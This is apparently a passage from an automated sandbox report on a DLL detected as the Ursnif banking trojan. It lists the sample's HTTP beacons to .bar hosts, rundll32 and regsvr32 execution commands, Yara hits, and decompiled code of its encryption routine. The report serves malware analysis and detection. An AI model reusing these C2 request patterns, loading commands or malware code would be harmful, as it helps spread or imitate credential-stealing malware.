                  Jan 21, 2022 07:56:04.387835979 CET12416OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:08.372697115 CET12417OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jan 21, 2022 07:56:16.326375961 CET12418OUTGET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.34975531.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:33.154788971 CET1141OUTGET /drew/QvhYBaeq_2F6Kr5S5lD/OqLkixN3sRa2UpR8i3hjYq/eJ9NYRqvvouL5/5HWqGU6L/VANwgL_2FOanliZpdSkommO/z_2FFnfFWj/XA9wFW7rsFws4V6TO/ECxua93xQfvB/2xJ5KsVMA_2/BJTXWzwMMI1Ry4/bSrLklQhxwLVQio5vEqnT/EuTu1lXMUBYE4EO9/fehTx7dve_2FJwl/oHCMlYRgtjfgvp4PcC/lf7RvC6QF/AJjhNY359JkAlb/_2BCF.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.34975231.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:33.156999111 CET1142OUTGET /drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.34975631.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:33.200898886 CET1143OUTGET /drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQT/SmvkeHiBSVF/jSdieAe6QVgPYk/Ls60EE1RdzPENlayPGjHS/AIjKP7dUycBtEyrA/RFerBbxZvrxnd_2/Bc1S7J_2FQDJBAH3dG/kHsLUg6CP/6tr_2F_2FmCAcHtuBxvU/3I9dXvsa3LnrU2f8IF1/dsxBAmQu5x_2BsDF7qQMQs/L_2FeC4tc/dGJ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:07:52:08
                  Start date:21/01/2022
                  Path:C:\Windows\System32\loaddll32.exe
                  Wow64 process (32bit):true
                  Commandline:loaddll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll"
                  Imagebase:0xbb0000
                  File size:116736 bytes
                  MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Start time:07:52:08
                  Start date:21/01/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
                  Imagebase:0xd80000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:52:08
                  Start date:21/01/2022
                  Path:C:\Windows\SysWOW64\regsvr32.exe
                  Wow64 process (32bit):true
                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll
                  Imagebase:0x2b0000
                  File size:20992 bytes
                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Start time:07:52:08
                  Start date:21/01/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
                  Imagebase:0x300000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Start time:07:52:09
                  Start date:21/01/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\Wartless_v8.8.9.0.dll,DllRegisterServer
                  Imagebase:0x300000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Start time:07:52:29
                  Start date:21/01/2022
                  Path:C:\Program Files\internet explorer\iexplore.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  Imagebase:0x7ff6ad3f0000
                  File size:823560 bytes
                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:52:30
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17410 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:52:31
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17414 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:52:31
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:82946 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:52:32
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17418 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:53:16
                  Start date:21/01/2022
                  Path:C:\Program Files\internet explorer\iexplore.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  Imagebase:0x7ff6ad3f0000
                  File size:823560 bytes
                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:53:17
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17410 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:53:19
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17416 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:07:53:19
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:82946 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:07:53:19
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:148484 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:07:53:50
                  Start date:21/01/2022
                  Path:C:\Program Files\internet explorer\iexplore.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  Imagebase:0x7ff6ad3f0000
                  File size:823560 bytes
                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:07:53:50
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17410 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:07:53:51
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17414 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:07:53:51
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:82946 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:07:53:51
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:214018 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:07:54:14
                  Start date:21/01/2022
                  Path:C:\Program Files\internet explorer\iexplore.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  Imagebase:0x7ff6ad3f0000
                  File size:823560 bytes
                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:07:54:15
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17410 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:07:54:18
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17416 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:07:54:20
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:148482 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:07:54:20
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:214018 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 010C4872 Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 10c4872-10c48b2 CryptAcquireContextW 136 10c48b8-10c48f4 memcpy CryptImportKey 135->136 137 10c4a09-10c4a0f GetLastError 135->137 139 10c48fa-10c490c CryptSetKeyParam 136->139 140 10c49f4-10c49fa GetLastError 136->140 138 10c4a12-10c4a19 137->138 142 10c49e0-10c49e6 GetLastError 139->142 143 10c4912-10c491b 139->143 141 10c49fd-10c4a07 CryptReleaseContext 140->141 141->138 144 10c49e9-10c49f2 CryptDestroyKey 142->144 145 10c491d-10c491f 143->145 146 10c4923-10c4930 call 10c63fd 143->146 144->141 145->146 147 10c4921 145->147 150 10c4936-10c493f 146->150 151 10c49d7-10c49de 146->151 147->146 152 10c4942-10c494a 150->152 151->144 153 10c494c 152->153 154 10c494f-10c496c memcpy 152->154 153->154 155 10c496e-10c4985 CryptEncrypt 154->155 156 10c4987-10c4996 CryptDecrypt 154->156 157 10c499c-10c499e 155->157 156->157 158 10c49ae-10c49b9 GetLastError 157->158 159 10c49a0-10c49aa 157->159 161 10c49cd-10c49d5 call 10c17ab 158->161 162 10c49bb-10c49cb 158->162 159->152 160 10c49ac 159->160 160->162 161->144 162->144
                    C-Code - Quality: 58%
                    			E010C4872(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x10ca0e4( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x10ca0c4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x11f
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E010C63FD(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x10ca0c8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E010C17AB(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                    0x010c487b
                    0x010c4881
                    0x010c4884
                    0x010c488a
                    0x010c488a
                    0x010c488c
                    0x010c488e
                    0x010c4891
                    0x010c4897
                    0x010c4898
                    0x010c4899
                    0x010c489f
                    0x010c48a4
                    0x010c48aa
                    0x010c48b2
                    0x010c4a0f
                    0x010c48b8
                    0x010c48ba
                    0x010c48c3
                    0x010c48c8
                    0x010c48da
                    0x010c48dd
                    0x010c48e1
                    0x010c48e8
                    0x010c48ec
                    0x010c48f4
                    0x010c49fa
                    0x010c48fa
                    0x010c48fa
                    0x010c48fe
                    0x010c48ff
                    0x010c4901
                    0x010c490c
                    0x010c49e6
                    0x010c4912
                    0x010c4912
                    0x010c4915
                    0x010c491b
                    0x010c4921
                    0x010c4921
                    0x010c4929
                    0x010c492d
                    0x010c4930
                    0x010c49d7
                    0x010c4936
                    0x010c493c
                    0x010c493f
                    0x010c4942
                    0x010c4944
                    0x010c4947
                    0x010c494a
                    0x010c494c
                    0x010c494c
                    0x010c4956
                    0x010c495b
                    0x010c495e
                    0x010c4961
                    0x010c4963
                    0x010c496c
                    0x010c4996
                    0x010c496e
                    0x010c497f
                    0x010c497f
                    0x010c499e
                    0x00000000
                    0x00000000
                    0x010c49a0
                    0x010c49a3
                    0x010c49a6
                    0x010c49aa
